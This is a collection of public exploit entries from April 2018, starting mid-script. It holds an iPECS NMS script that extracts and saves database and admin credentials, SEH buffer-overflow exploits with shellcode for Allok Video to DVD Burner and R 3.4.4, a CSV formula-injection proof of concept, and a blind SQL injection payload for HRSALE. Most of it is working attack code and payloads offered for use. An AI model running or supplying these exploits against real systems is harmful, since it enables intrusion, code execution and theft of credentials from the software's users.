users_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "http://192.168.1.55/nms/index.html", "Content-Type": "application/x-www-form-urlencoded", "X-Requested-With": "XMLHttpRequest", "Connection": "close"}
users_data={"command": "init_configuration", "client_id": "2", "user_id": user_id, "db_user": db_user, "db_pwd": db_pwd, "mfimSeq": "0", "req_system_id": "0", "req_system_name": ''}
r3 = requests.post(users_url, headers=users_headers, cookies=users_cookies, data=users_data)
print(r3.status_code, r3.reason)
user_dump = r3.content
print "Done. You can log in to the postgresql database using the below credentials."
print "\ndb_user: " + postgre_db_user
print "db_pwd: " + postgre_db_pwd
print "\nAnd/Or you can log in to the NMS using the following credentials"
m1 = re.search(r"userList:\[\[\d,'([^']*)','([^']*)", user_dump)
if m1 is not None:
    nms_admin = m1.group(1)
    nms_pwd = m1.group(2)
    print "\nnms_admin: " + nms_admin
    print "nms_pwd: " + nms_pwd
else:
    print "\nDid not get nms_admin and nms_pwd. Check the dump manually."
dumpfile = open("ipecsnms_dump.txt","w")
dumpfile.write(db_cred_dump)
dumpfile.write(user_dump)
dumpfile.close()
print "\nRaw output written to ipecsnms_dump.txt for further username and group enumeration."
print "Have fun!"
#######################################################
# Exploit Title: Buffer Overflow (SEH) on Allok Video to DVD Burner 2.6.1217
# Date: 23.04.2018
# Exploit Author: T3jv1l
# Vendor Homepage: http://www.alloksoft.com/
# Software: www.alloksoft.com/allok_dvdburner.exe
# Category: Local
# Contact: https://twitter.com/T3jv1l
# Version: Allok Video to DVD Burner 2.6.1217
# Tested on: Windows 7 SP1 x86
# Hello subinacls !
# Method Corelan Coder : https://www.corelan.be/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/
#############################################################
print """
#1. Download and install the setup file
#2. Run this exploit code via python 2.7
#3. A file "Evil.txt" will be created
#4. Copy the contents of the file (Evil.txt) and paste them in the License Name field
#5. Click Register and BOMM !!!! """
import struct
file = open("Evil.txt","wb")
buffer = 4000
junk = "A" * 780
nseh = "\x90\x90\xeb\x10"
seh = struct.pack("<L",0x10019A09)
nop = "\x90" * 20
# Shellcode Calc.exe
buf = ""
buf +="\xba\xd5\x31\x08\x38\xdb\xcb\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"
buf +="\x33\x83\xc3\x04\x31\x53\x0e\x03\x86\x3f\xea\xcd\xd4\xa8\x63"
buf +="\x2d\x24\x29\x14\xa7\xc1\x18\x06\xd3\x82\x09\x96\x97\xc6\xa1"
buf +="\x5d\xf5\xf2\x32\x13\xd2\xf5\xf3\x9e\x04\x38\x03\x2f\x89\x96"
buf +="\xc7\x31\x75\xe4\x1b\x92\x44\x27\x6e\xd3\x81\x55\x81\x81\x5a"
buf +="\x12\x30\x36\xee\x66\x89\x37\x20\xed\xb1\x4f\x45\x31\x45\xfa"
buf +="\x44\x61\xf6\x71\x0e\x99\x7c\xdd\xaf\x98\x51\x3d\x93\xd3\xde"
buf +="\xf6\x67\xe2\x36\xc7\x88\xd5\x76\x84\xb6\xda\x7a\xd4\xff\xdc"
buf +="\x64\xa3\x0b\x1f\x18\xb4\xcf\x62\xc6\x31\xd2\xc4\x8d\xe2\x36"
buf +="\xf5\x42\x74\xbc\xf9\x2f\xf2\x9a\x1d\xb1\xd7\x90\x19\x3a\xd6"
buf +="\x76\xa8\x78\xfd\x52\xf1\xdb\x9c\xc3\x5f\x8d\xa1\x14\x07\x72"
buf +="\x04\x5e\xa5\x67\x3e\x3d\xa3\x76\xb2\x3b\x8a\x79\xcc\x43\xbc"
buf +="\x11\xfd\xc8\x53\x65\x02\x1b\x10\x99\x48\x06\x30\x32\x15\xd2"
buf +="\x01\x5f\xa6\x08\x45\x66\x25\xb9\x35\x9d\x35\xc8\x30\xd9\xf1"
buf +="\x20\x48\x72\x94\x46\xff\x73\xbd\x24\x9e\xe7\x5d\x85\x05\x80"
buf +="\xc4\xd9"
exploit = junk + nseh + seh + nop + buf
fillers = buffer - len(exploit)
crush = exploit + "T" * fillers
print "[+] Crush Me"
file.write(crush)
file.close()
# Exploit Title: HRSALE The Ultimate HRM 1.0.2 - CSV Injection
# Date: 2018-04-23
# Exploit Author: 8bitsec
# CVE: CVE-2018-10257
# Vendor Homepage: https://codecanyon.net/
# Software Link: https://codecanyon.net/item/hrsale-the-ultimate-hrm/21665619
# Version: 1.0.2
# Tested on: [Kali Linux 2.0 | Mac OS 10.13]
Release Date:
=============
2018-04-23
Product & Service Introduction:
===============================
HRSALE provides you with a powerful and cost-effective HR platform to ensure you get the best from your employees and managers.
Technical Details & Description:
================================
A user is able to inject a spreadsheet formula into a profile field, and it is included unescaped in the exported CSV file.
Proof of Concept (PoC):
=======================
1. Log in with employee user credentials
2. Browse to My Profile and add =cmd|'/C calc'!A1 into the First Name field
3. Log in with the admin's credentials
4. Browse to Core HR > Employees Last Login
5. Click on the CSV button to download and open the exported CSV file
#!/usr/bin/python
#
# Exploit Author: bzyo
# CVE: CVE-2018-9060
# Twitter: @bzyo_
# Exploit Title: R 3.4.4 - Local Buffer Overflow
# Date: 03-27-2018
# Vulnerable Software: R 3.4.4
# Vendor Homepage: https://www.r-project.org/
# Version: 3.4.4
# Software Link: https://cloud.r-project.org/bin/windows/
# Tested On: Windows 7 x86
#
# Timeline:
# 03-27-18: Emailed author, no response
# 04-03-18: Emailed author, no response
# 04-10-18: Emailed author, no response
# 04-23-18: New version released; Submitted public disclosure
#
# lots of bad chars, use alpha_mixed
# badchars \x00\x0a\x0d\x0e and \x80 through \xbf
#
#
# PoC:
# 1. generate r344.txt, copy contents to clipboard
# 2. open app, select Edit, select 'GUI preferences'
# 3. paste r344.txt contents into 'Language for menus and messages'
# 4. select OK
# 5. pop calc
#
filename="r344.txt"
junk = "A"*900
#jump 6
nseh = "\xeb\x06\xcc\xcc"
#0x643c17af : pop esi # pop edi # ret | {PAGE_EXECUTE_READ} [Riconv.dll]
seh = "\xaf\x17\x3c\x64"
#msfvenom -a x86 -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d\x0e" -e x86/alpha_mixed -f c
#Payload size: 448 bytes
calc = ("\x89\xe1\xd9\xf7\xd9\x71\xf4\x5b\x53\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x59\x6c\x5a\x48\x4c\x42\x77\x70\x53\x30\x45\x50\x35\x30\x6b"
"\x39\x58\x65\x70\x31\x39\x50\x30\x64\x4c\x4b\x50\x50\x64\x70"
"\x6e\x6b\x71\x42\x34\x4c\x4e\x6b\x71\x42\x37\x64\x6e\x6b\x62"
"\x52\x56\x48\x36\x6f\x4c\x77\x61\x5a\x64\x66\x56\x51\x49\x6f"
"\x6e\x4c\x45\x6c\x75\x31\x71\x6c\x53\x32\x66\x4c\x55\x70\x69"
"\x51\x38\x4f\x44\x4d\x47\x71\x6a\x67\x78\x62\x6a\x52\x31\x42"
"\x76\x37\x4e\x6b\x70\x52\x44\x50\x6e\x6b\x61\x5a\x47\x4c\x6c"
"\x4b\x30\x4c\x34\x51\x71\x68\x4b\x53\x63\x78\x77\x71\x4b\x61"
"\x63\x61\x4e\x6b\x63\x69\x35\x70\x56\x61\x4e\x33\x6e\x6b\x57"
"\x39\x65\x48\x68\x63\x44\x7a\x37\x39\x6c\x4b\x46\x54\x6c\x4b"
"\x47\x71\x7a\x76\x35\x61\x49\x6f\x4c\x6c\x7a\x61\x6a\x6f\x64"
"\x4d\x55\x51\x4b\x77\x57\x48\x6b\x50\x74\x35\x69\x66\x65\x53"
"\x31\x6d\x4a\x58\x77\x4b\x61\x6d\x51\x34\x61\x65\x6a\x44\x61"
"\x48\x4e\x6b\x62\x78\x45\x74\x47\x71\x79\x43\x71\x76\x4c\x4b"
"\x64\x4c\x72\x6b\x6c\x4b\x73\x68\x35\x4c\x43\x31\x6a\x73\x6e"
"\x6b\x37\x74\x6e\x6b\x37\x71\x4e\x30\x4f\x79\x52\x64\x35\x74"
"\x55\x74\x71\x4b\x51\x4b\x51\x71\x70\x59\x72\x7a\x53\x61\x6b"
"\x4f\x59\x70\x73\x6f\x63\x6f\x72\x7a\x4c\x4b\x56\x72\x48\x6b"
"\x6e\x6d\x31\x4d\x50\x6a\x55\x51\x6e\x6d\x4b\x35\x4f\x42\x73"
"\x30\x65\x50\x55\x50\x42\x70\x72\x48\x70\x31\x4e\x6b\x42\x4f"
"\x6c\x47\x6b\x4f\x4a\x75\x4d\x6b\x5a\x50\x48\x35\x6e\x42\x31"
"\x46\x62\x48\x39\x36\x5a\x35\x6f\x4d\x6d\x4d\x4b\x4f\x79\x45"
"\x45\x6c\x63\x36\x73\x4c\x45\x5a\x6b\x30\x59\x6b\x79\x70\x50"
"\x75\x55\x55\x6d\x6b\x43\x77\x42\x33\x61\x62\x62\x4f\x33\x5a"
"\x33\x30\x56\x33\x49\x6f\x49\x45\x43\x53\x53\x51\x72\x4c\x53"
"\x53\x44\x6e\x65\x35\x64\x38\x43\x55\x67\x70\x41\x41")
fill = "D"*8000
buffer = junk + nseh + seh + calc + fill
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()
# Exploit Title: HRSALE The Ultimate HRM v1.0.2 - 'award_id' SQL Injection
# Date: 2018-04-23
# Exploit Author: 8bitsec
# CVE: CVE-2018-10256
# Vendor Homepage: https://codecanyon.net/
# Software Link: https://codecanyon.net/item/hrsale-the-ultimate-hrm/21665619
# Version: 1.0.2
# Tested on: [Kali Linux 2.0 | Mac OS 10.13]
Release Date:
=============
2018-04-23
Product & Service Introduction:
===============================
HRSALE provides you with a powerful and cost-effective HR platform to ensure you get the best from your employees and managers.
Technical Details & Description:
================================
SQL injection in the award_id parameter.
Proof of Concept (PoC):
=======================
SQLi:
https://localhost/[path]/admin/user/read_awards/?jd=1&is_ajax=1&mode=modal&data=view_award&award_id=1' AND 1303=1303 AND 'BzpS'='BzpS
Parameter: award_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: jd=1&is_ajax=1&mode=modal&data=view_award&award_id=1' AND 1303=1303 AND 'BzpS'='BzpS